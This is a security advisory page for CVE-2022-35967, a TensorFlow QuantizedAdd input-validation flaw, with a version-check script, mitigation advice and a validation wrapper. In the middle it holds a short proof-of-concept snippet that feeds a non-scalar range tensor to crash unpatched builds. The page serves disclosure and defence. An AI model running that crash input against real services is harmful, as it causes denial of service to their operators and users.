CVE-2022-35967: CWE-20: Improper Input Validation in tensorflow/tensorflow

Severity: Medium
Published: Fri Sep 16 2022 (09/16/2022, 20:35:10 UTC)
Source: CVE
Vendor/Project: tensorflow
Product: tensorflow

Description

TensorFlow is an open source platform for machine learning. If `QuantizedAdd` is given `min_input` or `max_input` tensors of a nonzero rank, it results in a segfault that can be used to trigger a denial of service attack. We have patched the issue in GitHub commit 49b3824d83af706df0ad07e4e677d88659756d89. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range. There are no known workarounds for this issue.
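
For teams triaging exposure, the patched releases listed above imply the affected ranges: everything before 2.7.2, 2.8.0 before 2.8.1, and 2.9.0 before 2.9.1. The snippet below is a minimal sketch of a local version check derived from those ranges; it assumes the `packaging` library is installed and is illustrative only, not an official detection tool.

```python
# Illustrative check of whether the locally installed TensorFlow falls in an
# affected range for CVE-2022-35967. Version boundaries are derived from the
# patched releases named in the advisory; assumes `pip install packaging`.
import tensorflow as tf
from packaging.version import Version

AFFECTED_RANGES = [
    (Version("0"), Version("2.7.2")),      # all releases before 2.7.2
    (Version("2.8.0"), Version("2.8.1")),  # 2.8.0 <= v < 2.8.1
    (Version("2.9.0"), Version("2.9.1")),  # 2.9.0 <= v < 2.9.1
]

installed = Version(tf.__version__)
affected = any(low <= installed < high for low, high in AFFECTED_RANGES)
print(f"TensorFlow {installed}: "
      f"{'affected - upgrade to a patched release' if affected else 'not affected'}")
```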

AI-Powered Analysis

Last updated: 06/22/2025, 20:06:24 UTC

Technical Analysis

CVE-2022-35967 is a medium-severity vulnerability in TensorFlow, an open-source machine learning platform widely used for developing and deploying AI models. The vulnerability arises from improper input validation (CWE-20) in the `QuantizedAdd` operation. Specifically, if the `min_input` or `max_input` tensors provided to `QuantizedAdd` have a nonzero rank (i.e., are not scalar tensors as expected), this triggers a segmentation fault (segfault) in the TensorFlow runtime. This segfault can be exploited to cause a denial of service (DoS) condition, crashing the application or service using TensorFlow.

The issue affects multiple TensorFlow versions: all versions prior to 2.7.2, versions 2.8.0 up to but not including 2.8.1, and versions 2.9.0 up to but not including 2.9.1. The vulnerability was patched in GitHub commit 49b3824d83af706df0ad07e4e677d88659756d89 and incorporated into TensorFlow 2.10.0, with backports planned for 2.7.2, 2.8.1, and 2.9.1. There are no known workarounds, and no exploits have been observed in the wild to date.

The root cause is a lack of proper validation of tensor shapes before processing, leading to memory access violations. Exploitation requires an attacker to supply crafted inputs to the vulnerable TensorFlow function, which may be feasible in environments where TensorFlow processes untrusted or user-supplied data. This vulnerability impacts the availability of TensorFlow-based applications by enabling DoS attacks but does not directly compromise confidentiality or integrity.
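
The shape constraint at the heart of the bug can be illustrated with the raw op directly. The sketch below is based on the advisory description; note that in the `tf.raw_ops.QuantizedAdd` signature the range tensors are exposed as `min_x`/`max_x`/`min_y`/`max_y`, which correspond to the `min_input`/`max_input` values referenced above. On an unpatched build this input is expected to crash the process, so it should only be run in a disposable test environment; patched releases reject the non-scalar range tensor with an error instead.

```python
# Sketch of the malformed input condition: the min/max range tensors for a
# quantized add must be scalars (rank 0); here min_x is given rank 1.
# Run only against a disposable, unpatched TensorFlow build.
import tensorflow as tf

x = tf.constant(140, shape=[1], dtype=tf.quint8)
y = tf.constant(26, shape=[1], dtype=tf.quint8)
min_x = tf.constant([], shape=[0], dtype=tf.float32)  # rank 1 instead of rank 0
max_x = tf.constant(0.0, shape=[], dtype=tf.float32)
min_y = tf.constant(0.0, shape=[], dtype=tf.float32)
max_y = tf.constant(0.0, shape=[], dtype=tf.float32)

# On vulnerable versions this segfaults; on patched versions the range tensors
# are validated first and an InvalidArgumentError is raised instead.
tf.raw_ops.QuantizedAdd(x=x, y=y, min_x=min_x, max_x=max_x,
                        min_y=min_y, max_y=max_y, Toutput=tf.qint32)
```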

Potential Impact

For European organizations, the impact of CVE-2022-35967 primarily concerns service availability and operational continuity. Organizations leveraging TensorFlow in production environments—such as research institutions, AI startups, financial services using AI for fraud detection, healthcare providers deploying machine learning models, and industrial automation firms—may face application crashes or service interruptions if exploited. This can lead to downtime, loss of productivity, and potential financial losses. Since TensorFlow is often integrated into larger AI pipelines, a DoS in one component could cascade, affecting dependent services or delaying critical AI-driven decisions. However, the vulnerability does not allow for remote code execution or data breaches directly, limiting its impact to denial of service. The absence of known exploits reduces immediate risk, but the widespread use of TensorFlow in Europe means unpatched systems remain vulnerable. Organizations with public-facing AI services or those processing untrusted inputs are at higher risk. Additionally, sectors with stringent uptime requirements, such as telecommunications, energy, and transportation, could experience operational disruptions if this vulnerability is triggered.

Mitigation Recommendations

European organizations should prioritize upgrading TensorFlow to version 2.10.0 or later, or apply the backported patches for versions 2.7.2, 2.8.1, and 2.9.1 as soon as possible. Since no workarounds exist, patching is the only effective mitigation. Organizations should audit their AI pipelines to identify where `QuantizedAdd` operations are used and assess whether untrusted or external inputs could reach this function. Implementing input validation at the application layer to ensure tensor shapes conform to expected scalar ranks before passing them to TensorFlow can reduce risk. Monitoring application logs for segmentation faults or crashes related to TensorFlow can help detect attempted exploitation. In environments where upgrading is delayed, isolating TensorFlow workloads and limiting exposure to untrusted data sources can reduce attack surface. Additionally, integrating runtime protection tools that detect abnormal process crashes or memory violations can provide early warning. Organizations should also review their incident response plans to include scenarios involving AI service disruptions.
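
Where an immediate upgrade is not possible, the application-layer validation mentioned above can be approximated with a thin wrapper that rejects non-scalar range tensors before they reach the quantized op. The sketch below is illustrative only: the wrapper and its helper names (`safe_quantized_add`, `_require_scalar`) are hypothetical and not part of TensorFlow; only the `tf.raw_ops.QuantizedAdd` call is TensorFlow API.

```python
# Illustrative application-layer guard: reject non-scalar quantization range
# tensors before they reach the vulnerable op. Helper names are hypothetical.
import tensorflow as tf

def _require_scalar(tensor: tf.Tensor, name: str) -> None:
    """Raise early if a quantization range tensor is not rank 0."""
    if tensor.shape.rank != 0:
        raise ValueError(
            f"{name} must be a scalar (rank 0) tensor, got shape {tensor.shape}")

def safe_quantized_add(x, y, min_x, max_x, min_y, max_y, Toutput=tf.qint32):
    # Validate every min/max range tensor before invoking the op, so malformed
    # (potentially attacker-supplied) shapes fail with a Python exception
    # instead of reaching native code.
    for name, t in (("min_x", min_x), ("max_x", max_x),
                    ("min_y", min_y), ("max_y", max_y)):
        _require_scalar(tf.convert_to_tensor(t), name)
    return tf.raw_ops.QuantizedAdd(x=x, y=y, min_x=min_x, max_x=max_x,
                                   min_y=min_y, max_y=max_y, Toutput=Toutput)
```

The same pattern applies to any other quantized op that consumes externally supplied range tensors; it reduces the attack surface but is not a substitute for applying the patch.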

Technical Details

Data Version: 5.1
Assigner Short Name: GitHub_M
Date Reserved: 2022-07-15T00:00:00.000Z
CISA Enriched: true

Threat ID: 682d9845c4522896dcbf405b

Added to database: 5/21/2025, 9:09:25 AM

Last enriched: 6/22/2025, 8:06:24 PM

Last updated: 7/29/2025, 6:15:37 AM
